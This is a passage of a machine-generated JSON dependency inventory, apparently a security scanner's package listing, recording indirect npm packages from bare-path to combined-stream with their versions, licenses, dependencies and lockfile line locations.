"Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6514, "EndLine": 6523 } ], "AnalyzedBy": "npm" }, { "ID": "bare-path@3.0.0", "Name": "bare-path", "Identifier": { "PURL": "pkg:npm/bare-path@3.0.0", "UID": "4830c15dee9a36af" }, "Version": "3.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bare-os@3.6.2" ], "Locations": [ { "StartLine": 6524, "EndLine": 6533 } ], "AnalyzedBy": "npm" }, { "ID": "bare-stream@2.7.0", "Name": "bare-stream", "Identifier": { "PURL": "pkg:npm/bare-stream@2.7.0", "UID": "fca91e2b199e7429" }, "Version": "2.7.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bare-events@2.7.0", "streamx@2.23.0" ], "Locations": [ { "StartLine": 6534, "EndLine": 6555 } ], "AnalyzedBy": "npm" }, { "ID": "bare-url@2.2.2", "Name": "bare-url", "Identifier": { "PURL": "pkg:npm/bare-url@2.2.2", "UID": "a3ee2692532c915b" }, "Version": "2.2.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bare-path@3.0.0" ], "Locations": [ { "StartLine": 6556, "EndLine": 6565 } ], "AnalyzedBy": "npm" }, { "ID": "base-64@0.1.0", "Name": "base-64", "Identifier": { "PURL": "pkg:npm/base-64@0.1.0", "UID": "5b9d1fe9b91dadda" }, "Version": "0.1.0", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17501, "EndLine": 17505 }, { "StartLine": 17810, "EndLine": 17814 } ], "AnalyzedBy": "npm" }, { "ID": "base64-arraybuffer@1.0.2", "Name": "base64-arraybuffer", "Identifier": { "PURL": "pkg:npm/base64-arraybuffer@1.0.2", "UID": "f23f66b2874f2051" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6572, "EndLine": 6580 } ], "AnalyzedBy": "npm" }, { "ID": "base64-js@1.5.1", "Name": "base64-js", "Identifier": { "PURL": "pkg:npm/base64-js@1.5.1", "UID": "8f7eb4a5b2e2f4af" }, "Version": "1.5.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6581, "EndLine": 6600 } ], "AnalyzedBy": "npm" }, { "ID": "baseline-browser-mapping@2.8.13", "Name": "baseline-browser-mapping", "Identifier": { "PURL": "pkg:npm/baseline-browser-mapping@2.8.13", "UID": "aa8dfb62c7ab348a" }, "Version": "2.8.13", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6601, "EndLine": 6609 } ], "AnalyzedBy": "npm" }, { "ID": "big-integer@1.6.52", "Name": "big-integer", "Identifier": { "PURL": "pkg:npm/big-integer@1.6.52", "UID": "2e697d0697b9b2f2" }, "Version": "1.6.52", "Licenses": [ "Unlicense" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6610, "EndLine": 6618 } ], "AnalyzedBy": "npm" }, { "ID": "bin-links@5.0.0", "Name": "bin-links", "Identifier": { "PURL": "pkg:npm/bin-links@5.0.0", "UID": "23a3cef4105085ed" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cmd-shim@7.0.0", "npm-normalize-package-bin@4.0.0", "proc-log@5.0.0", "read-cmd-shim@5.0.0", "write-file-atomic@6.0.0" ], "Locations": [ { "StartLine": 14052, "EndLine": 14066 } ], "AnalyzedBy": "npm" }, { "ID": "binary-extensions@3.1.0", "Name": "binary-extensions", "Identifier": { "PURL": "pkg:npm/binary-extensions@3.1.0", "UID": "2029d0181aff0af9" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14067, "EndLine": 14079 } ], "AnalyzedBy": "npm" }, { "ID": "bindings@1.5.0", "Name": "bindings", "Identifier": { "PURL": "pkg:npm/bindings@1.5.0", "UID": "f11dbbca34a94b29" }, "Version": "1.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "file-uri-to-path@1.0.0" ], "Locations": [ { "StartLine": 6619, "EndLine": 6628 } ], "AnalyzedBy": "npm" }, { "ID": "bl@4.1.0", "Name": "bl", "Identifier": { "PURL": "pkg:npm/bl@4.1.0", "UID": "3e64fa245fde0405" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "buffer@5.7.1", "inherits@2.0.4", "readable-stream@3.6.2" ], "Locations": [ { "StartLine": 6629, "EndLine": 6639 } ], "AnalyzedBy": "npm" }, { "ID": "body-parser@1.20.3", "Name": "body-parser", "Identifier": { "PURL": "pkg:npm/body-parser@1.20.3", "UID": "14732633cdda79aa" }, "Version": "1.20.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bytes@3.1.2", "content-type@1.0.5", "debug@2.6.9", "depd@2.0.0", "destroy@1.2.0", "http-errors@2.0.0", "iconv-lite@0.4.24", "on-finished@2.4.1", "qs@6.13.0", "raw-body@2.5.2", "type-is@1.6.18", "unpipe@1.0.0" ], "Locations": [ { "StartLine": 6640, "EndLine": 6664 } ], "AnalyzedBy": "npm" }, { "ID": "boolbase@1.0.0", "Name": "boolbase", "Identifier": { "PURL": "pkg:npm/boolbase@1.0.0", "UID": "4d1c85c37d9e5c99" }, "Version": "1.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6682, "EndLine": 6687 } ], "AnalyzedBy": "npm" }, { "ID": "bplist-creator@0.1.0", "Name": "bplist-creator", "Identifier": { "PURL": "pkg:npm/bplist-creator@0.1.0", "UID": "e107d46188b2b1ea" }, "Version": "0.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "stream-buffers@2.2.0" ], "Locations": [ { "StartLine": 6688, "EndLine": 6696 } ], "AnalyzedBy": "npm" }, { "ID": "bplist-parser@0.3.1", "Name": "bplist-parser", "Identifier": { "PURL": "pkg:npm/bplist-parser@0.3.1", "UID": "892ce16eed98915f" }, "Version": "0.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "big-integer@1.6.52" ], "Locations": [ { "StartLine": 6697, "EndLine": 6708 } ], "AnalyzedBy": "npm" }, { "ID": "brace-expansion@1.1.12", "Name": "brace-expansion", "Identifier": { "PURL": "pkg:npm/brace-expansion@1.1.12", "UID": "84bc3c1c5bf9dc3f" }, "Version": "1.1.12", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "balanced-match@1.0.2", "concat-map@0.0.1" ], "Locations": [ { "StartLine": 2273, "EndLine": 2283 }, { "StartLine": 3265, "EndLine": 3275 }, { "StartLine": 8744, "EndLine": 8754 }, { "StartLine": 8833, "EndLine": 8843 }, { "StartLine": 9768, "EndLine": 9777 }, { "StartLine": 20569, "EndLine": 20578 } ], "AnalyzedBy": "npm" }, { "ID": "brace-expansion@2.0.2", "Name": "brace-expansion", "Identifier": { "PURL": "pkg:npm/brace-expansion@2.0.2", "UID": "17232eb9182a44a1" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "balanced-match@1.0.2" ], "Locations": [ { "StartLine": 6709, "EndLine": 6717 }, { "StartLine": 14080, "EndLine": 14089 } ], "AnalyzedBy": "npm" }, { "ID": "braces@3.0.3", "Name": "braces", "Identifier": { "PURL": "pkg:npm/braces@3.0.3", "UID": "a4969d4920314eb0" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fill-range@7.1.1" ], "Locations": [ { "StartLine": 6718, "EndLine": 6729 } ], "AnalyzedBy": "npm" }, { "ID": "browserslist@4.26.3", "Name": "browserslist", "Identifier": { "PURL": "pkg:npm/browserslist@4.26.3", "UID": "c3329e15836b09c1" }, "Version": "4.26.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "baseline-browser-mapping@2.8.13", "caniuse-lite@1.0.30001749", "electron-to-chromium@1.5.233", "node-releases@2.0.23", "update-browserslist-db@1.1.3" ], "Locations": [ { "StartLine": 6730, "EndLine": 6762 } ], "AnalyzedBy": "npm" }, { "ID": "bser@2.1.1", "Name": "bser", "Identifier": { "PURL": "pkg:npm/bser@2.1.1", "UID": "6be90a34d9caad67" }, "Version": "2.1.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "node-int64@0.4.0" ], "Locations": [ { "StartLine": 6763, "EndLine": 6771 } ], "AnalyzedBy": "npm" }, { "ID": "buffer@5.7.1", "Name": "buffer", "Identifier": { "PURL": "pkg:npm/buffer@5.7.1", "UID": "744995c58092a459" }, "Version": "5.7.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@1.5.1", "ieee754@1.2.1" ], "Locations": [ { "StartLine": 6772, "EndLine": 6795 } ], "AnalyzedBy": "npm" }, { "ID": "buffer@6.0.3", "Name": "buffer", "Identifier": { "PURL": "pkg:npm/buffer@6.0.3", "UID": "f36da97105673782" }, "Version": "6.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@1.5.1", "ieee754@1.2.1" ], "Locations": [ { "StartLine": 18249, "EndLine": 18272 } ], "AnalyzedBy": "npm" }, { "ID": "buffer-from@1.1.2", "Name": "buffer-from", "Identifier": { "PURL": "pkg:npm/buffer-from@1.1.2", "UID": "9f602163a25706ea" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6796, "EndLine": 6801 } ], "AnalyzedBy": "npm" }, { "ID": "bytes@3.1.2", "Name": "bytes", "Identifier": { "PURL": "pkg:npm/bytes@3.1.2", "UID": "510ce57d47ae4e5" }, "Version": "3.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6802, "EndLine": 6811 } ], "AnalyzedBy": "npm" }, { "ID": "cacache@15.3.0", "Name": "cacache", "Identifier": { "PURL": "pkg:npm/cacache@15.3.0", "UID": "e922abb5ac83b132" }, "Version": "15.3.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/fs@1.1.1", "@npmcli/move-file@1.1.2", "chownr@2.0.0", "fs-minipass@2.1.0", "glob@7.2.3", "infer-owner@1.0.4", "lru-cache@6.0.0", "minipass-collect@1.0.2", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "minipass@3.3.6", "mkdirp@1.0.4", "p-map@4.0.0", "promise-inflight@1.0.1", "rimraf@3.0.2", "ssri@8.0.1", "tar@6.2.1", "unique-filename@1.1.1" ], "Locations": [ { "StartLine": 6812, "EndLine": 6841 } ], "AnalyzedBy": "npm" }, { "ID": "cacache@19.0.1", "Name": "cacache", "Identifier": { "PURL": "pkg:npm/cacache@19.0.1", "UID": "ae6be16eb134c35b" }, "Version": "19.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/fs@4.0.0", "fs-minipass@3.0.3", "glob@10.4.5", "lru-cache@10.4.3", "minipass-collect@2.0.1", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "minipass@7.1.2", "p-map@7.0.3", "ssri@12.0.0", "tar@7.5.1", "unique-filename@4.0.0" ], "Locations": [ { "StartLine": 14996, "EndLine": 15017 } ], "AnalyzedBy": "npm" }, { "ID": "cacache@20.0.1", "Name": "cacache", "Identifier": { "PURL": "pkg:npm/cacache@20.0.1", "UID": "238cf185c2a5e1b5" }, "Version": "20.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/fs@4.0.0", "fs-minipass@3.0.3", "glob@11.0.3", "lru-cache@11.2.2", "minipass-collect@2.0.1", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "minipass@7.1.2", "p-map@7.0.3", "ssri@12.0.0", "unique-filename@4.0.0" ], "Locations": [ { "StartLine": 14090, "EndLine": 14110 } ], "AnalyzedBy": "npm" }, { "ID": "call-bind@1.0.8", "Name": "call-bind", "Identifier": { "PURL": "pkg:npm/call-bind@1.0.8", "UID": "cd4e2f349802efbb" }, "Version": "1.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "es-define-property@1.0.1", "get-intrinsic@1.3.0", "set-function-length@1.2.2" ], "Locations": [ { "StartLine": 6885, "EndLine": 6902 } ], "AnalyzedBy": "npm" }, { "ID": "call-bind-apply-helpers@1.0.2", "Name": "call-bind-apply-helpers", "Identifier": { "PURL": "pkg:npm/call-bind-apply-helpers@1.0.2", "UID": "afd95aa864fbe250" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "function-bind@1.1.2" ], "Locations": [ { "StartLine": 6903, "EndLine": 6915 } ], "AnalyzedBy": "npm" }, { "ID": "call-bound@1.0.4", "Name": "call-bound", "Identifier": { "PURL": "pkg:npm/call-bound@1.0.4", "UID": "50a02cd41b88b264" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "get-intrinsic@1.3.0" ], "Locations": [ { "StartLine": 6916, "EndLine": 6931 } ], "AnalyzedBy": "npm" }, { "ID": "callsites@3.1.0", "Name": "callsites", "Identifier": { "PURL": "pkg:npm/callsites@3.1.0", "UID": "aa23fea53b89c280" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6932, "EndLine": 6940 } ], "AnalyzedBy": "npm" }, { "ID": "camelcase@5.3.1", "Name": "camelcase", "Identifier": { "PURL": "pkg:npm/camelcase@5.3.1", "UID": "c1946f8cc4d08aa1" }, "Version": "5.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6941, "EndLine": 6949 } ], "AnalyzedBy": "npm" }, { "ID": "camelcase@6.3.0", "Name": "camelcase", "Identifier": { "PURL": "pkg:npm/camelcase@6.3.0", "UID": "eaab30be338fc9e" }, "Version": "6.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5144, "EndLine": 5155 }, { "StartLine": 11529, "EndLine": 11540 } ], "AnalyzedBy": "npm" }, { "ID": "camelcase-keys@6.2.2", "Name": "camelcase-keys", "Identifier": { "PURL": "pkg:npm/camelcase-keys@6.2.2", "UID": "dfc9b1ac78d84f2e" }, "Version": "6.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "camelcase@5.3.1", "map-obj@4.3.0", "quick-lru@4.0.1" ], "Locations": [ { "StartLine": 6950, "EndLine": 6966 } ], "AnalyzedBy": "npm" }, { "ID": "camelize@1.0.1", "Name": "camelize", "Identifier": { "PURL": "pkg:npm/camelize@1.0.1", "UID": "c2c3ee613896103d" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6967, "EndLine": 6975 } ], "AnalyzedBy": "npm" }, { "ID": "caniuse-lite@1.0.30001749", "Name": "caniuse-lite", "Identifier": { "PURL": "pkg:npm/caniuse-lite@1.0.30001749", "UID": "63d0b7541ec121fa" }, "Version": "1.0.30001749", "Licenses": [ "CC-BY-4.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6976, "EndLine": 6995 } ], "AnalyzedBy": "npm" }, { "ID": "chalk@2.4.2", "Name": "chalk", "Identifier": { "PURL": "pkg:npm/chalk@2.4.2", "UID": "4b96096f755e32ac" }, "Version": "2.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@3.2.1", "escape-string-regexp@1.0.5", "supports-color@5.5.0" ], "Locations": [ { "StartLine": 510, "EndLine": 523 } ], "AnalyzedBy": "npm" }, { "ID": "chalk@4.1.2", "Name": "chalk", "Identifier": { "PURL": "pkg:npm/chalk@4.1.2", "UID": "3c204e3cae930544" }, "Version": "4.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@4.3.0", "supports-color@7.2.0" ], "Locations": [ { "StartLine": 6996, "EndLine": 7011 } ], "AnalyzedBy": "npm" }, { "ID": "chalk@5.6.2", "Name": "chalk", "Identifier": { "PURL": "pkg:npm/chalk@5.6.2", "UID": "17ae292f34337db5" }, "Version": "5.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14111, "EndLine": 14123 } ], "AnalyzedBy": "npm" }, { "ID": "chownr@1.1.4", "Name": "chownr", "Identifier": { "PURL": "pkg:npm/chownr@1.1.4", "UID": "7a5ab81f825d9d52" }, "Version": "1.1.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7022, "EndLine": 7027 } ], "AnalyzedBy": "npm" }, { "ID": "chownr@2.0.0", "Name": "chownr", "Identifier": { "PURL": "pkg:npm/chownr@2.0.0", "UID": "8a8ab1f8d88b8568" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6842, "EndLine": 6851 }, { "StartLine": 20494, "EndLine": 20503 } ], "AnalyzedBy": "npm" }, { "ID": "chownr@3.0.0", "Name": "chownr", "Identifier": { "PURL": "pkg:npm/chownr@3.0.0", "UID": "bf56de3f45c803ad" }, "Version": "3.0.0", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14124, "EndLine": 14133 } ], "AnalyzedBy": "npm" }, { "ID": "chrome-launcher@0.15.2", "Name": "chrome-launcher", "Identifier": { "PURL": "pkg:npm/chrome-launcher@0.15.2", "UID": "b7aff604ca2abf1f" }, "Version": "0.15.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@24.7.0", "escape-string-regexp@4.0.0", "is-wsl@2.2.0", "lighthouse-logger@1.4.2" ], "Locations": [ { "StartLine": 7028, "EndLine": 7045 } ], "AnalyzedBy": "npm" }, { "ID": "chromium-edge-launcher@0.2.0", "Name": "chromium-edge-launcher", "Identifier": { "PURL": "pkg:npm/chromium-edge-launcher@0.2.0", "UID": "6bbedde05b10c4fd" }, "Version": "0.2.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@24.7.0", "escape-string-regexp@4.0.0", "is-wsl@2.2.0", "lighthouse-logger@1.4.2", "mkdirp@1.0.4", "rimraf@3.0.2" ], "Locations": [ { "StartLine": 7058, "EndLine": 7071 } ], "AnalyzedBy": "npm" }, { "ID": "ci-info@2.0.0", "Name": "ci-info", "Identifier": { "PURL": "pkg:npm/ci-info@2.0.0", "UID": "8a5ea06fe4001f57" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12692, "EndLine": 12697 } ], "AnalyzedBy": "npm" }, { "ID": "ci-info@3.9.0", "Name": "ci-info", "Identifier": { "PURL": "pkg:npm/ci-info@3.9.0", "UID": "c44076bdcc294b59" }, "Version": "3.9.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7084, "EndLine": 7098 } ], "AnalyzedBy": "npm" }, { "ID": "ci-info@4.3.1", "Name": "ci-info", "Identifier": { "PURL": "pkg:npm/ci-info@4.3.1", "UID": "b4b54d318fdc6e22" }, "Version": "4.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14134, "EndLine": 14147 } ], "AnalyzedBy": "npm" }, { "ID": "cidr-regex@5.0.1", "Name": "cidr-regex", "Identifier": { "PURL": "pkg:npm/cidr-regex@5.0.1", "UID": "a455674c13a4f262" }, "Version": "5.0.1", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ip-regex@5.0.0" ], "Locations": [ { "StartLine": 14148, "EndLine": 14158 } ], "AnalyzedBy": "npm" }, { "ID": "clean-stack@2.2.0", "Name": "clean-stack", "Identifier": { "PURL": "pkg:npm/clean-stack@2.2.0", "UID": "e7766c2251b54e87" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7106, "EndLine": 7115 } ], "AnalyzedBy": "npm" }, { "ID": "cli-columns@4.0.0", "Name": "cli-columns", "Identifier": { "PURL": "pkg:npm/cli-columns@4.0.0", "UID": "dd3df0023ce5c9c" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 14159, "EndLine": 14170 } ], "AnalyzedBy": "npm" }, { "ID": "cli-cursor@3.1.0", "Name": "cli-cursor", "Identifier": { "PURL": "pkg:npm/cli-cursor@3.1.0", "UID": "42454490fdb97bc8" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "restore-cursor@3.1.0" ], "Locations": [ { "StartLine": 7116, "EndLine": 7127 } ], "AnalyzedBy": "npm" }, { "ID": "cli-spinners@2.9.2", "Name": "cli-spinners", "Identifier": { "PURL": "pkg:npm/cli-spinners@2.9.2", "UID": "d149e82a5f2e9def" }, "Version": "2.9.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7128, "EndLine": 7139 } ], "AnalyzedBy": "npm" }, { "ID": "cliui@6.0.0", "Name": "cliui", "Identifier": { "PURL": "pkg:npm/cliui@6.0.0", "UID": "58d5128185adf905" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3", "strip-ansi@6.0.1", "wrap-ansi@6.2.0" ], "Locations": [ { "StartLine": 11935, "EndLine": 11946 } ], "AnalyzedBy": "npm" }, { "ID": "cliui@7.0.4", "Name": "cliui", "Identifier": { "PURL": "pkg:npm/cliui@7.0.4", "UID": "319c005b7103f44b" }, "Version": "7.0.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3", "strip-ansi@6.0.1", "wrap-ansi@7.0.0" ], "Locations": [ { "StartLine": 18495, "EndLine": 18505 } ], "AnalyzedBy": "npm" }, { "ID": "cliui@8.0.1", "Name": "cliui", "Identifier": { "PURL": "pkg:npm/cliui@8.0.1", "UID": "d0867e9c8a7a1f74" }, "Version": "8.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3", "strip-ansi@6.0.1", "wrap-ansi@7.0.0" ], "Locations": [ { "StartLine": 7140, "EndLine": 7153 } ], "AnalyzedBy": "npm" }, { "ID": "clone@1.0.4", "Name": "clone", "Identifier": { "PURL": "pkg:npm/clone@1.0.4", "UID": "c22546e280b7ad80" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7154, "EndLine": 7162 } ], "AnalyzedBy": "npm" }, { "ID": "cmd-shim@7.0.0", "Name": "cmd-shim", "Identifier": { "PURL": "pkg:npm/cmd-shim@7.0.0", "UID": "59af6f93a33729ba" }, "Version": "7.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14171, "EndLine": 14178 } ], "AnalyzedBy": "npm" }, { "ID": "code-point-at@1.1.0", "Name": "code-point-at", "Identifier": { "PURL": "pkg:npm/code-point-at@1.1.0", "UID": "81947ca40cbbe83f" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7174, "EndLine": 7182 } ], "AnalyzedBy": "npm" }, { "ID": "color@3.2.1", "Name": "color", "Identifier": { "PURL": "pkg:npm/color@3.2.1", "UID": "e49e83c1bcf16436" }, "Version": "3.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-convert@1.9.3", "color-string@1.9.1" ], "Locations": [ { "StartLine": 18152, "EndLine": 18161 } ], "AnalyzedBy": "npm" }, { "ID": "color@4.2.3", "Name": "color", "Identifier": { "PURL": "pkg:npm/color@4.2.3", "UID": "fac2dc5e494ee5c2" }, "Version": "4.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-convert@2.0.1", "color-string@1.9.1" ], "Locations": [ { "StartLine": 7190, "EndLine": 7202 } ], "AnalyzedBy": "npm" }, { "ID": "color-convert@1.9.3", "Name": "color-convert", "Identifier": { "PURL": "pkg:npm/color-convert@1.9.3", "UID": "c859797d8d518ebf" }, "Version": "1.9.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@1.1.3" ], "Locations": [ { "StartLine": 524, "EndLine": 532 }, { "StartLine": 18162, "EndLine": 18170 }, { "StartLine": 19730, "EndLine": 19739 } ], "AnalyzedBy": "npm" }, { "ID": "color-convert@2.0.1", "Name": "color-convert", "Identifier": { "PURL": "pkg:npm/color-convert@2.0.1", "UID": "e8f659b6a4eb5ed" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@1.1.4" ], "Locations": [ { "StartLine": 7203, "EndLine": 7214 }, { "StartLine": 14179, "EndLine": 14191 } ], "AnalyzedBy": "npm" }, { "ID": "color-name@1.1.3", "Name": "color-name", "Identifier": { "PURL": "pkg:npm/color-name@1.1.3", "UID": "5497b0537320fbcb" }, "Version": "1.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 533, "EndLine": 538 }, { "StartLine": 18171, "EndLine": 18176 }, { "StartLine": 19740, "EndLine": 19746 } ], "AnalyzedBy": "npm" }, { "ID": "color-name@1.1.4", "Name": "color-name", "Identifier": { "PURL": "pkg:npm/color-name@1.1.4", "UID": "87d55b81f0295834" }, "Version": "1.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7215, "EndLine": 7220 }, { "StartLine": 14192, "EndLine": 14198 } ], "AnalyzedBy": "npm" }, { "ID": "color-name@2.0.2", "Name": "color-name", "Identifier": { "PURL": "pkg:npm/color-name@2.0.2", "UID": "ec3f28b79f209a1d" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7230, "EndLine": 7238 } ], "AnalyzedBy": "npm" }, { "ID": "color-parse@2.0.2", "Name": "color-parse", "Identifier": { "PURL": "pkg:npm/color-parse@2.0.2", "UID": "8bd6000b685bc20e" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@2.0.2" ], "Locations": [ { "StartLine": 7221, "EndLine": 7229 } ], "AnalyzedBy": "npm" }, { "ID": "color-rgba@3.0.0", "Name": "color-rgba", "Identifier": { "PURL": "pkg:npm/color-rgba@3.0.0", "UID": "f8c4cc8b7aa89d11" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-parse@2.0.2", "color-space@2.3.2" ], "Locations": [ { "StartLine": 7239, "EndLine": 7248 } ], "AnalyzedBy": "npm" }, { "ID": "color-space@2.3.2", "Name": "color-space", "Identifier": { "PURL": "pkg:npm/color-space@2.3.2", "UID": "fe0cbee362a20ffd" }, "Version": "2.3.2", "Licenses": [ "Unlicense" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7249, "EndLine": 7254 } ], "AnalyzedBy": "npm" }, { "ID": "color-string@1.9.1", "Name": "color-string", "Identifier": { "PURL": "pkg:npm/color-string@1.9.1", "UID": "e7c23a736b7035ed" }, "Version": "1.9.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@1.1.4", "simple-swizzle@0.2.4" ], "Locations": [ { "StartLine": 7255, "EndLine": 7264 } ], "AnalyzedBy": "npm" }, { "ID": "color-support@1.1.3", "Name": "color-support", "Identifier": { "PURL": "pkg:npm/color-support@1.1.3", "UID": "7a7d5bf928ce6f84" }, "Version": "1.1.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7265, "EndLine": 7274 } ], "AnalyzedBy": "npm" }, { "ID": "colorette@1.4.0", "Name": "colorette", "Identifier": { "PURL": "pkg:npm/colorette@1.4.0", "UID": "8fd771b475d1ca2f" }, "Version": "1.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7275, "EndLine": 7281 } ], "AnalyzedBy": "npm" }, { "ID": "combined-stream@1.0.8", "Name": "combined-stream", "Identifier": { "PURL": "pkg:npm/combined-stream@1.0.8", "UID": "bc11066619f49d7b" }, "Version": "1.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "delayed-stream@1.0.0" ], "Locations": [ { "StartLine": 7282, "EndLine": 